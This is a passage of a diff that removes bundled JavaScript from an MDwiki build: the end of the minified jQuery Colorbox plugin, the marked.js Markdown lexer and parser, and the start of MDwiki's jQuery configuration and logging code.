b,c,h,l,o,p,q,g=y.length,i="frameBorder",k="allowTransparency";if(S){if(l=function(){clearTimeout(V),C.detach().hide(),eb(j,K.onComplete)},n&&R&&A.fadeIn(100),D.html(K.title).add(A).show(),g>1){if("string"==typeof K.current&&E.html(K.current.replace("{current}",Q+1).replace("{total}",g)).show(),G[K.loop||g-1>Q?"show":"hide"]().html(K.next),H[K.loop||Q?"show":"hide"]().html(K.previous),K.slideshow&&F.show(),K.preloading)for(b=[$(-1),$(1)];c=y[b.pop()];)q=a.data(c,e),q&&q.href?(o=q.href,a.isFunction(o)&&(o=o.call(c))):o=c.href,ab(o)&&(p=new Image,p.src=o)}else J.hide();K.iframe?(h=Z("iframe")[0],i in h&&(h[i]=0),k in h&&(h[k]="true"),h.name=f+ +new Date,K.fastIframe?l():a(h).one("load",l),h.src=K.href,K.scrolling||(h.scrolling="no"),a(h).addClass(f+"Iframe").appendTo(A).one(m,function(){h.src="//about:blank"})):l(),"fade"===K.transition?r.fadeTo(d,1,s):s()}},"fade"===K.transition?r.fadeTo(d,0,function(){W.position(0,c)}):W.position(d,c)}},W.load=function(b){var c,d,e=W.prep;T=!0,R=!1,P=y[Q],b||db(),eb(m),eb(i,K.onLoad),K.h=K.height?_(K.height,"y")-N-L:K.innerHeight&&_(K.innerHeight,"y"),K.w=K.width?_(K.width,"x")-O-M:K.innerWidth&&_(K.innerWidth,"x"),K.mw=K.w,K.mh=K.h,K.maxWidth&&(K.mw=_(K.maxWidth,"x")-O-M,K.mw=K.w&&K.w<K.mw?K.w:K.mw),K.maxHeight&&(K.mh=_(K.maxHeight,"y")-N-L,K.mh=K.h&&K.h<K.mh?K.h:K.mh),c=K.href,V=setTimeout(function(){C.show().appendTo(t)},100),K.inline?(Z(X).hide().insertBefore(a(c)[0]).one(m,function(){a(this).replaceWith(A.children())}),e(a(c))):K.iframe?e(" "):K.html?e(K.html):ab(c)?(a(R=new Image).addClass(f+"Photo").error(function(){K.title=!1,e(Z(X,"Error").html(K.imgError))}).load(function(){var a;R.onload=null,K.scalePhotos&&(d=function(){R.height-=R.height*a,R.width-=R.width*a},K.mw&&R.width>K.mw&&(a=(R.width-K.mw)/R.width,d()),K.mh&&R.height>K.mh&&(a=(R.height-K.mh)/R.height,d())),K.h&&(R.style.marginTop=Math.max(K.h-R.height,0)/2+"px"),y[1]&&(K.loop||y[Q+1])&&(R.style.cursor="pointer",R.onclick=function(){W.next()}),n&&(R.style.msInterpolationMode="bicubic"),setTimeout(function(){e(R)},1)}),setTimeout(function(){R.src=c},1)):c&&B.load(c,K.data,function(b,c){e("error"===c?Z(X,"Error").html(K.xhrError):a(this).contents())})},W.next=function(){!T&&y[1]&&(K.loop||y[Q+1])&&(Q=$(1),W.load())},W.prev=function(){!T&&y[1]&&(K.loop||Q)&&(Q=$(-1),W.load())},W.close=function(){S&&!U&&(U=!0,S=!1,eb(k,K.onCleanup),z.unbind("."+f+" ."+p),q.fadeTo(200,0),r.stop().fadeTo(300,0,function(){r.add(q).css({opacity:1,cursor:"auto"}).hide(),eb(m),A.remove(),setTimeout(function(){U=!1,eb(l,K.onClosed)},1)}))},W.remove=function(){a([]).add(r).add(q).remove(),r=null,a("."+g).removeData(e).removeClass(g).die()},W.element=function(){return a(P)},W.settings=d)})(jQuery,document,this);</script>
-<!-- END extlib/js/jquery.colorbox.min.js -->
-<!-- START dist/MDwiki.js -->
-<script type="text/javascript">;(function() {
-
-/**
- * Block-Level Grammar
- */
-
-var block = {
-  newline: /^\n+/,
-  code: /^( {4}[^\n]+\n*)+/,
-  fences: noop,
-  hr: /^( *[-*_]){3,} *(?:\n+|$)/,
-  heading: /^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,
-  nptable: noop,
-  lheading: /^([^\n]+)\n *(=|-){3,} *\n*/,
-  blockquote: /^( *>[^\n]+(\n[^\n]+)*\n*)+/,
-  list: /^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,
-  html: /^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,
-  def: /^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,
-  table: noop,
-  paragraph: /^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,
-  text: /^[^\n]+/
-};
-
-block.bullet = /(?:[*+-]|\d+\.)/;
-block.item = /^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/;
-block.item = replace(block.item, 'gm')
-  (/bull/g, block.bullet)
-  ();
-
-block.list = replace(block.list)
-  (/bull/g, block.bullet)
-  ('hr', /\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)
-  ();
-
-block._tag = '(?!(?:'
-  + 'a|em|strong|small|s|cite|q|dfn|abbr|data|time|code'
-  + '|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo'
-  + '|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b';
-
-block.html = replace(block.html)
-  ('comment', /<!--[\s\S]*?-->/)
-  ('closed', /<(tag)[\s\S]+?<\/\1>/)
-  ('closing', /<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)
-  (/tag/g, block._tag)
-  ();
-
-block.paragraph = replace(block.paragraph)
-  ('hr', block.hr)
-  ('heading', block.heading)
-  ('lheading', block.lheading)
-  ('blockquote', block.blockquote)
-  ('tag', '<' + block._tag)
-  ('def', block.def)
-  ();
-
-/**
- * Normal Block Grammar
- */
-
-block.normal = merge({}, block);
-
-/**
- * GFM Block Grammar
- */
-
-block.gfm = merge({}, block.normal, {
-  fences: /^ *(`{3,}|~{3,}) *(\S+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,
-  paragraph: /^/
-});
-
-block.gfm.paragraph = replace(block.paragraph)
-  ('(?!', '(?!' + block.gfm.fences.source.replace('\\1', '\\2') + '|')
-  ();
-
-/**
- * GFM + Tables Block Grammar
- */
-
-block.tables = merge({}, block.gfm, {
-  nptable: /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,
-  table: /^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/
-});
-
-/**
- * Block Lexer
- */
-
-function Lexer(options) {
-  this.tokens = [];
-  this.tokens.links = {};
-  this.options = options || marked.defaults;
-  this.rules = block.normal;
-
-  if (this.options.gfm) {
-    if (this.options.tables) {
-      this.rules = block.tables;
-    } else {
-      this.rules = block.gfm;
-    }
-  }
-}
-
-/**
- * Expose Block Rules
- */
-
-Lexer.rules = block;
-
-/**
- * Static Lex Method
- */
-
-Lexer.lex = function(src, options) {
-  var lexer = new Lexer(options);
-  return lexer.lex(src);
-};
-
-/**
- * Preprocessing
- */
-
-Lexer.prototype.lex = function(src) {
-  src = src
-    .replace(/\r\n|\r/g, '\n')
-    .replace(/\t/g, '    ')
-    .replace(/\u00a0/g, ' ')
-    .replace(/\u2424/g, '\n');
-
-  return this.token(src, true);
-};
-
-/**
- * Lexing
- */
-
-Lexer.prototype.token = function(src, top) {
-  var src = src.replace(/^ +$/gm, '')
-    , next
-    , loose
-    , cap
-    , bull
-    , b
-    , item
-    , space
-    , i
-    , l;
-
-  while (src) {
-    // newline
-    if (cap = this.rules.newline.exec(src)) {
-      src = src.substring(cap[0].length);
-      if (cap[0].length > 1) {
-        this.tokens.push({
-          type: 'space'
-        });
-      }
-    }
-
-    // code
-    if (cap = this.rules.code.exec(src)) {
-      src = src.substring(cap[0].length);
-      cap = cap[0].replace(/^ {4}/gm, '');
-      this.tokens.push({
-        type: 'code',
-        text: !this.options.pedantic
-          ? cap.replace(/\n+$/, '')
-          : cap
-      });
-      continue;
-    }
-
-    // fences (gfm)
-    if (cap = this.rules.fences.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'code',
-        lang: cap[2],
-        text: cap[3]
-      });
-      continue;
-    }
-
-    // heading
-    if (cap = this.rules.heading.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'heading',
-        depth: cap[1].length,
-        text: cap[2]
-      });
-      continue;
-    }
-
-    // table no leading pipe (gfm)
-    if (top && (cap = this.rules.nptable.exec(src))) {
-      src = src.substring(cap[0].length);
-
-      item = {
-        type: 'table',
-        header: cap[1].replace(/^ *| *\| *$/g, '').split(/ *\| */),
-        align: cap[2].replace(/^ *|\| *$/g, '').split(/ *\| */),
-        cells: cap[3].replace(/\n$/, '').split('\n')
-      };
-
-      for (i = 0; i < item.align.length; i++) {
-        if (/^ *-+: *$/.test(item.align[i])) {
-          item.align[i] = 'right';
-        } else if (/^ *:-+: *$/.test(item.align[i])) {
-          item.align[i] = 'center';
-        } else if (/^ *:-+ *$/.test(item.align[i])) {
-          item.align[i] = 'left';
-        } else {
-          item.align[i] = null;
-        }
-      }
-
-      for (i = 0; i < item.cells.length; i++) {
-        item.cells[i] = item.cells[i].split(/ *\| */);
-      }
-
-      this.tokens.push(item);
-
-      continue;
-    }
-
-    // lheading
-    if (cap = this.rules.lheading.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'heading',
-        depth: cap[2] === '=' ? 1 : 2,
-        text: cap[1]
-      });
-      continue;
-    }
-
-    // hr
-    if (cap = this.rules.hr.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'hr'
-      });
-      continue;
-    }
-
-    // blockquote
-    if (cap = this.rules.blockquote.exec(src)) {
-      src = src.substring(cap[0].length);
-
-      this.tokens.push({
-        type: 'blockquote_start'
-      });
-
-      cap = cap[0].replace(/^ *> ?/gm, '');
-
-      // Pass `top` to keep the current
-      // "toplevel" state. This is exactly
-      // how markdown.pl works.
-      this.token(cap, top);
-
-      this.tokens.push({
-        type: 'blockquote_end'
-      });
-
-      continue;
-    }
-
-    // list
-    if (cap = this.rules.list.exec(src)) {
-      src = src.substring(cap[0].length);
-      bull = cap[2];
-
-      this.tokens.push({
-        type: 'list_start',
-        ordered: bull.length > 1
-      });
-
-      // Get each top-level item.
-      cap = cap[0].match(this.rules.item);
-
-      next = false;
-      l = cap.length;
-      i = 0;
-
-      for (; i < l; i++) {
-        item = cap[i];
-
-        // Remove the list item's bullet
-        // so it is seen as the next token.
-        space = item.length;
-        item = item.replace(/^ *([*+-]|\d+\.) +/, '');
-
-        // Outdent whatever the
-        // list item contains. Hacky.
-        if (~item.indexOf('\n ')) {
-          space -= item.length;
-          item = !this.options.pedantic
-            ? item.replace(new RegExp('^ {1,' + space + '}', 'gm'), '')
-            : item.replace(/^ {1,4}/gm, '');
-        }
-
-        // Determine whether the next list item belongs here.
-        // Backpedal if it does not belong in this list.
-        if (this.options.smartLists && i !== l - 1) {
-          b = block.bullet.exec(cap[i+1])[0];
-          if (bull !== b && !(bull.length > 1 && b.length > 1)) {
-            src = cap.slice(i + 1).join('\n') + src;
-            i = l - 1;
-          }
-        }
-
-        // Determine whether item is loose or not.
-        // Use: /(^|\n)(?! )[^\n]+\n\n(?!\s*$)/
-        // for discount behavior.
-        loose = next || /\n\n(?!\s*$)/.test(item);
-        if (i !== l - 1) {
-          next = item[item.length-1] === '\n';
-          if (!loose) loose = next;
-        }
-
-        this.tokens.push({
-          type: loose
-            ? 'loose_item_start'
-            : 'list_item_start'
-        });
-
-        // Recurse.
-        this.token(item, false);
-
-        this.tokens.push({
-          type: 'list_item_end'
-        });
-      }
-
-      this.tokens.push({
-        type: 'list_end'
-      });
-
-      continue;
-    }
-
-    // html
-    if (cap = this.rules.html.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: this.options.sanitize
-          ? 'paragraph'
-          : 'html',
-        pre: cap[1] === 'pre' || cap[1] === 'script',
-        text: cap[0]
-      });
-      continue;
-    }
-
-    // def
-    if (top && (cap = this.rules.def.exec(src))) {
-      src = src.substring(cap[0].length);
-      this.tokens.links[cap[1].toLowerCase()] = {
-        href: cap[2],
-        title: cap[3]
-      };
-      continue;
-    }
-
-    // table (gfm)
-    if (top && (cap = this.rules.table.exec(src))) {
-      src = src.substring(cap[0].length);
-
-      item = {
-        type: 'table',
-        header: cap[1].replace(/^ *| *\| *$/g, '').split(/ *\| */),
-        align: cap[2].replace(/^ *|\| *$/g, '').split(/ *\| */),
-        cells: cap[3].replace(/(?: *\| *)?\n$/, '').split('\n')
-      };
-
-      for (i = 0; i < item.align.length; i++) {
-        if (/^ *-+: *$/.test(item.align[i])) {
-          item.align[i] = 'right';
-        } else if (/^ *:-+: *$/.test(item.align[i])) {
-          item.align[i] = 'center';
-        } else if (/^ *:-+ *$/.test(item.align[i])) {
-          item.align[i] = 'left';
-        } else {
-          item.align[i] = null;
-        }
-      }
-
-      for (i = 0; i < item.cells.length; i++) {
-        item.cells[i] = item.cells[i]
-          .replace(/^ *\| *| *\| *$/g, '')
-          .split(/ *\| */);
-      }
-
-      this.tokens.push(item);
-
-      continue;
-    }
-
-    // top-level paragraph
-    if (top && (cap = this.rules.paragraph.exec(src))) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'paragraph',
-        text: cap[1][cap[1].length-1] === '\n'
-          ? cap[1].slice(0, -1)
-          : cap[1]
-      });
-      continue;
-    }
-
-    // text
-    if (cap = this.rules.text.exec(src)) {
-      // Top-level should never reach here.
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'text',
-        text: cap[0]
-      });
-      continue;
-    }
-
-    if (src) {
-      throw new
-        Error('Infinite loop on byte: ' + src.charCodeAt(0));
-    }
-  }
-
-  return this.tokens;
-};
-
-/**
- * Inline-Level Grammar
- */
-
-var inline = {
-  escape: /^\\([\\`*{}\[\]()#+\-.!_>])/,
-  autolink: /^<([^ >]+(@|:\/)[^ >]+)>/,
-  url: noop,
-  tag: /^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,
-  link: /^!?\[(inside)\]\(href\)/,
-  reflink: /^!?\[(inside)\]\s*\[([^\]]*)\]/,
-  nolink: /^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,
-  strong: /^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,
-  em: /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,
-  code: /^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,
-  br: /^ {2,}\n(?!\s*$)/,
-  del: noop,
-  text: /^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/
-};
-
-inline._inside = /(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/;
-inline._href = /\s*<?(.*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/;
-
-inline.link = replace(inline.link)
-  ('inside', inline._inside)
-  ('href', inline._href)
-  ();
-
-inline.reflink = replace(inline.reflink)
-  ('inside', inline._inside)
-  ();
-
-/**
- * Normal Inline Grammar
- */
-
-inline.normal = merge({}, inline);
-
-/**
- * Pedantic Inline Grammar
- */
-
-inline.pedantic = merge({}, inline.normal, {
-  strong: /^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,
-  em: /^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/
-});
-
-/**
- * GFM Inline Grammar
- */
-
-inline.gfm = merge({}, inline.normal, {
-  escape: replace(inline.escape)('])', '~|])')(),
-  url: /^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,
-  del: /^~~(?=\S)([\s\S]*?\S)~~/,
-  text: replace(inline.text)
-    (']|', '~]|')
-    ('|', '|https?://|')
-    ()
-});
-
-/**
- * GFM + Line Breaks Inline Grammar
- */
-
-inline.breaks = merge({}, inline.gfm, {
-  br: replace(inline.br)('{2,}', '*')(),
-  text: replace(inline.gfm.text)('{2,}', '*')()
-});
-
-/**
- * Inline Lexer & Compiler
- */
-
-function InlineLexer(links, options) {
-  this.options = options || marked.defaults;
-  this.links = links;
-  this.rules = inline.normal;
-
-  if (!this.links) {
-    throw new
-      Error('Tokens array requires a `links` property.');
-  }
-
-  if (this.options.gfm) {
-    if (this.options.breaks) {
-      this.rules = inline.breaks;
-    } else {
-      this.rules = inline.gfm;
-    }
-  } else if (this.options.pedantic) {
-    this.rules = inline.pedantic;
-  }
-}
-
-/**
- * Expose Inline Rules
- */
-
-InlineLexer.rules = inline;
-
-/**
- * Static Lexing/Compiling Method
- */
-
-InlineLexer.output = function(src, links, options) {
-  var inline = new InlineLexer(links, options);
-  return inline.output(src);
-};
-
-/**
- * Lexing/Compiling
- */
-
-InlineLexer.prototype.output = function(src) {
-  var out = ''
-    , link
-    , text
-    , href
-    , cap;
-
-  while (src) {
-    // escape
-    if (cap = this.rules.escape.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += cap[1];
-      continue;
-    }
-
-    // autolink
-    if (cap = this.rules.autolink.exec(src)) {
-      src = src.substring(cap[0].length);
-      if (cap[2] === '@') {
-        text = cap[1][6] === ':'
-          ? this.mangle(cap[1].substring(7))
-          : this.mangle(cap[1]);
-        href = this.mangle('mailto:') + text;
-      } else {
-        text = escape(cap[1]);
-        href = text;
-      }
-      out += '<a href="'
-        + href
-        + '">'
-        + text
-        + '</a>';
-      continue;
-    }
-
-    // url (gfm)
-    if (cap = this.rules.url.exec(src)) {
-      src = src.substring(cap[0].length);
-      text = escape(cap[1]);
-      href = text;
-      out += '<a href="'
-        + href
-        + '">'
-        + text
-        + '</a>';
-      continue;
-    }
-
-    // tag
-    if (cap = this.rules.tag.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += this.options.sanitize
-        ? escape(cap[0])
-        : cap[0];
-      continue;
-    }
-
-    // link
-    if (cap = this.rules.link.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += this.outputLink(cap, {
-        href: cap[2],
-        title: cap[3]
-      });
-      continue;
-    }
-
-    // reflink, nolink
-    if ((cap = this.rules.reflink.exec(src))
-        || (cap = this.rules.nolink.exec(src))) {
-      src = src.substring(cap[0].length);
-      link = (cap[2] || cap[1]).replace(/\s+/g, ' ');
-      link = this.links[link.toLowerCase()];
-      if (!link || !link.href) {
-        out += cap[0][0];
-        src = cap[0].substring(1) + src;
-        continue;
-      }
-      out += this.outputLink(cap, link);
-      continue;
-    }
-
-    // strong
-    if (cap = this.rules.strong.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<strong>'
-        + this.output(cap[2] || cap[1])
-        + '</strong>';
-      continue;
-    }
-
-    // em
-    if (cap = this.rules.em.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<em>'
-        + this.output(cap[2] || cap[1])
-        + '</em>';
-      continue;
-    }
-
-    // code
-    if (cap = this.rules.code.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<code>'
-        + escape(cap[2], true)
-        + '</code>';
-      continue;
-    }
-
-    // br
-    if (cap = this.rules.br.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<br>';
-      continue;
-    }
-
-    // del (gfm)
-    if (cap = this.rules.del.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<del>'
-        + this.output(cap[1])
-        + '</del>';
-      continue;
-    }
-
-    // text
-    if (cap = this.rules.text.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += escape(cap[0]);
-      continue;
-    }
-
-    if (src) {
-      throw new
-        Error('Infinite loop on byte: ' + src.charCodeAt(0));
-    }
-  }
-
-  return out;
-};
-
-/**
- * Compile Link
- */
-
-InlineLexer.prototype.outputLink = function(cap, link) {
-  if (cap[0][0] !== '!') {
-    return '<a href="'
-      + escape(link.href)
-      + '"'
-      + (link.title
-      ? ' title="'
-      + escape(link.title)
-      + '"'
-      : '')
-      + '>'
-      + this.output(cap[1])
-      + '</a>';
-  } else {
-    return '<img src="'
-      + escape(link.href)
-      + '" alt="'
-      + escape(cap[1])
-      + '"'
-      + (link.title
-      ? ' title="'
-      + escape(link.title)
-      + '"'
-      : '')
-      + '>';
-  }
-};
-
-/**
- * Smartypants Transformations
- */
-
-InlineLexer.prototype.smartypants = function(text) {
-  if (!this.options.smartypants) return text;
-  return text
-    .replace(/--/g, '—')
-    .replace(/'([^']*)'/g, '‘$1’')
-    .replace(/"([^"]*)"/g, '“$1”')
-    .replace(/\.{3}/g, '…');
-};
-
-/**
- * Mangle Links
- */
-
-InlineLexer.prototype.mangle = function(text) {
-  var out = ''
-    , l = text.length
-    , i = 0
-    , ch;
-
-  for (; i < l; i++) {
-    ch = text.charCodeAt(i);
-    if (Math.random() > 0.5) {
-      ch = 'x' + ch.toString(16);
-    }
-    out += '&#' + ch + ';';
-  }
-
-  return out;
-};
-
-/**
- * Parsing & Compiling
- */
-
-function Parser(options) {
-  this.tokens = [];
-  this.token = null;
-  this.options = options || marked.defaults;
-}
-
-/**
- * Static Parse Method
- */
-
-Parser.parse = function(src, options) {
-  var parser = new Parser(options);
-  return parser.parse(src);
-};
-
-/**
- * Parse Loop
- */
-
-Parser.prototype.parse = function(src) {
-  this.inline = new InlineLexer(src.links, this.options);
-  this.tokens = src.reverse();
-
-  var out = '';
-  while (this.next()) {
-    out += this.tok();
-  }
-
-  return out;
-};
-
-/**
- * Next Token
- */
-
-Parser.prototype.next = function() {
-  return this.token = this.tokens.pop();
-};
-
-/**
- * Preview Next Token
- */
-
-Parser.prototype.peek = function() {
-  return this.tokens[this.tokens.length-1] || 0;
-};
-
-/**
- * Parse Text Tokens
- */
-
-Parser.prototype.parseText = function() {
-  var body = this.token.text;
-
-  while (this.peek().type === 'text') {
-    body += '\n' + this.next().text;
-  }
-
-  return this.inline.output(body);
-};
-
-/**
- * Parse Current Token
- */
-
-Parser.prototype.tok = function() {
-  switch (this.token.type) {
-    case 'space': {
-      return '';
-    }
-    case 'hr': {
-      return '<hr>\n';
-    }
-    case 'heading': {
-      return '<h'
-        + this.token.depth
-        + '>'
-        + this.inline.output(this.token.text)
-        + '</h'
-        + this.token.depth
-        + '>\n';
-    }
-    case 'code': {
-      if (this.options.highlight) {
-        var code = this.options.highlight(this.token.text, this.token.lang);
-        if (code != null && code !== this.token.text) {
-          this.token.escaped = true;
-          this.token.text = code;
-        }
-      }
-
-      if (!this.token.escaped) {
-        this.token.text = escape(this.token.text, true);
-      }
-
-      return '<pre><code'
-        + (this.token.lang
-        ? ' class="'
-        + this.options.langPrefix
-        + this.token.lang
-        + '"'
-        : '')
-        + '>'
-        + this.token.text
-        + '</code></pre>\n';
-    }
-    case 'table': {
-      var body = ''
-        , heading
-        , i
-        , row
-        , cell
-        , j;
-
-      // header
-      body += '<thead>\n<tr>\n';
-      for (i = 0; i < this.token.header.length; i++) {
-        heading = this.inline.output(this.token.header[i]);
-        body += this.token.align[i]
-          ? '<th align="' + this.token.align[i] + '">' + heading + '</th>\n'
-          : '<th>' + heading + '</th>\n';
-      }
-      body += '</tr>\n</thead>\n';
-
-      // body
-      body += '<tbody>\n'
-      for (i = 0; i < this.token.cells.length; i++) {
-        row = this.token.cells[i];
-        body += '<tr>\n';
-        for (j = 0; j < row.length; j++) {
-          cell = this.inline.output(row[j]);
-          body += this.token.align[j]
-            ? '<td align="' + this.token.align[j] + '">' + cell + '</td>\n'
-            : '<td>' + cell + '</td>\n';
-        }
-        body += '</tr>\n';
-      }
-      body += '</tbody>\n';
-
-      return '<table>\n'
-        + body
-        + '</table>\n';
-    }
-    case 'blockquote_start': {
-      var body = '';
-
-      while (this.next().type !== 'blockquote_end') {
-        body += this.tok();
-      }
-
-      return '<blockquote>\n'
-        + body
-        + '</blockquote>\n';
-    }
-    case 'list_start': {
-      var type = this.token.ordered ? 'ol' : 'ul'
-        , body = '';
-
-      while (this.next().type !== 'list_end') {
-        body += this.tok();
-      }
-
-      return '<'
-        + type
-        + '>\n'
-        + body
-        + '</'
-        + type
-        + '>\n';
-    }
-    case 'list_item_start': {
-      var body = '';
-
-      while (this.next().type !== 'list_item_end') {
-        body += this.token.type === 'text'
-          ? this.parseText()
-          : this.tok();
-      }
-
-      return '<li>'
-        + body
-        + '</li>\n';
-    }
-    case 'loose_item_start': {
-      var body = '';
-
-      while (this.next().type !== 'list_item_end') {
-        body += this.tok();
-      }
-
-      return '<li>'
-        + body
-        + '</li>\n';
-    }
-    case 'html': {
-      return !this.token.pre && !this.options.pedantic
-        ? this.inline.output(this.token.text)
-        : this.token.text;
-    }
-    case 'paragraph': {
-      return '<p>'
-        + this.inline.output(this.token.text)
-        + '</p>\n';
-    }
-    case 'text': {
-      return '<p>'
-        + this.parseText()
-        + '</p>\n';
-    }
-  }
-};
-
-/**
- * Helpers
- */
-
-function escape(html, encode) {
-  return html
-    .replace(!encode ? /&(?!#?\w+;)/g : /&/g, '&amp;')
-    .replace(/</g, '&lt;')
-    .replace(/>/g, '&gt;')
-    .replace(/"/g, '&quot;')
-    .replace(/'/g, '&#39;');
-}
-
-function replace(regex, opt) {
-  regex = regex.source;
-  opt = opt || '';
-  return function self(name, val) {
-    if (!name) return new RegExp(regex, opt);
-    val = val.source || val;
-    val = val.replace(/(^|[^\[])\^/g, '$1');
-    regex = regex.replace(name, val);
-    return self;
-  };
-}
-
-function noop() {}
-noop.exec = noop;
-
-function merge(obj) {
-  var i = 1
-    , target
-    , key;
-
-  for (; i < arguments.length; i++) {
-    target = arguments[i];
-    for (key in target) {
-      if (Object.prototype.hasOwnProperty.call(target, key)) {
-        obj[key] = target[key];
-      }
-    }
-  }
-
-  return obj;
-}
-
-/**
- * Marked
- */
-
-function marked(src, opt, callback) {
-  if (callback || typeof opt === 'function') {
-    if (!callback) {
-      callback = opt;
-      opt = null;
-    }
-
-    if (opt) opt = merge({}, marked.defaults, opt);
-
-    var tokens = Lexer.lex(tokens, opt)
-      , highlight = opt.highlight
-      , pending = 0
-      , l = tokens.length
-      , i = 0;
-
-    if (!highlight || highlight.length < 3) {
-      return callback(null, Parser.parse(tokens, opt));
-    }
-
-    var done = function() {
-      delete opt.highlight;
-      var out = Parser.parse(tokens, opt);
-      opt.highlight = highlight;
-      return callback(null, out);
-    };
-
-    for (; i < l; i++) {
-      (function(token) {
-        if (token.type !== 'code') return;
-        pending++;
-        return highlight(token.text, token.lang, function(err, code) {
-          if (code == null || code === token.text) {
-            return --pending || done();
-          }
-          token.text = code;
-          token.escaped = true;
-          --pending || done();
-        });
-      })(tokens[i]);
-    }
-
-    return;
-  }
-  try {
-    if (opt) opt = merge({}, marked.defaults, opt);
-    return Parser.parse(Lexer.lex(src, opt), opt);
-  } catch (e) {
-    e.message += '\nPlease report this to https://github.com/chjj/marked.';
-    if ((opt || marked.defaults).silent) {
-      return '<p>An error occured:</p><pre>'
-        + escape(e.message + '', true)
-        + '</pre>';
-    }
-    throw e;
-  }
-}
-
-/**
- * Options
- */
-
-marked.options =
-marked.setOptions = function(opt) {
-  merge(marked.defaults, opt);
-  return marked;
-};
-
-marked.defaults = {
-  gfm: true,
-  tables: true,
-  breaks: false,
-  pedantic: false,
-  sanitize: false,
-  smartLists: false,
-  silent: false,
-  highlight: null,
-  langPrefix: 'lang-'
-};
-
-/**
- * Expose
- */
-
-marked.Parser = Parser;
-marked.parser = Parser.parse;
-
-marked.Lexer = Lexer;
-marked.lexer = Lexer.lex;
-
-marked.InlineLexer = InlineLexer;
-marked.inlineLexer = InlineLexer.output;
-
-marked.parse = marked;
-
-if (typeof exports === 'object') {
-  module.exports = marked;
-} else if (typeof define === 'function' && define.amd) {
-  define(function() { return marked; });
-} else {
-  this.marked = marked;
-}
-
-}).call(function() {
-  return this || (typeof window !== 'undefined' ? window : global);
-}());
-
-(function($) {
-    'use strict';
-
-    // hide the whole page so we dont see the DOM flickering
-    // will be shown upon page load complete or error
-    $('html').addClass('md-hidden-load');
-
-    // register our $.md object
-    $.md = function (method){
-        if ($.md.publicMethods[method]) {
-            return $.md.publicMethods[method].apply(this,
-                Array.prototype.slice.call(arguments, 1)
-            );
-        } else {
-            $.error('Method ' + method + ' does not exist on jquery.md');
-        }
-    };
-    // default config
-    $.md.config = {
-        title:  null,
-        useSideMenu: true,
-        lineBreaks: 'gfm',
-        additionalFooterText: '',
-        anchorCharacter: '&para;',
-        tocAnchor: '[ &uarr; ]'
-    };
-
-
-    $.md.gimmicks = [];
-    $.md.stages = [];
-
-    // the location of the main markdown file we display
-    $.md.mainHref = '';
-
-    // the in-page anchor that is specified after the !
-    $.md.inPageAnchor = '';
-
-
-    $.md.loglevel = {
-        TRACE: 10,
-        DEBUG: 20,
-        INFO: 30,
-        WARN: 40,
-        ERROR: 50,
-        FATAL: 60
-    };
-    // $.md.logThreshold = $.md.loglevel.DEBUG;
-    $.md.logThreshold = $.md.loglevel.WARN;
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-    $.md.getLogger = function() {
-
-        var loglevel = $.md.loglevel;
-
-        var log = function(logtarget) {
-            var self = this;
-            var level = loglevel[logtarget];
-            return function(msg) {
-                if ($.md.logThreshold <= level) {
-                    console.log('[' + logtarget + '] ' + msg);
-                }
-            };
-        };
-
-        var logger = {};
-        logger.trace = log('TRACE');
-        logger.debug = log('DEBUG');
-        logger.info = log('INFO');
-        logger.warn = log('WARN');
-        logger.error = log('ERROR');
-        logger.fatal = log('FATAL');
-
-        return logger;
-    };
-}(jQuery));
-
-(function($) {
-    'use strict';
-    var log = $.md.getLogger();
-
-    $.Stage = function(name) {
-        var self = $.extend($.Deferred(), {});
-        self.name = name;
-        self.events = [];
-        self.started = false;
-
-        self.reset = function() {
-            self.complete = $.Deferred();
-            self.outstanding = [];
-        };
-
-        self.reset();
-
-        self.subscribe = function(fn) {
-            if (self.started) {
-                $.error('Subscribing to stage which already started!');
-            }
